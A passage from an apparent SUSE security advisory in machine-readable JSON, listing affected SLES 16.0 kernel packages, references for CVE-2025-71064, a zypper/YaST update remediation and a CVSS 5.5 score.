"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
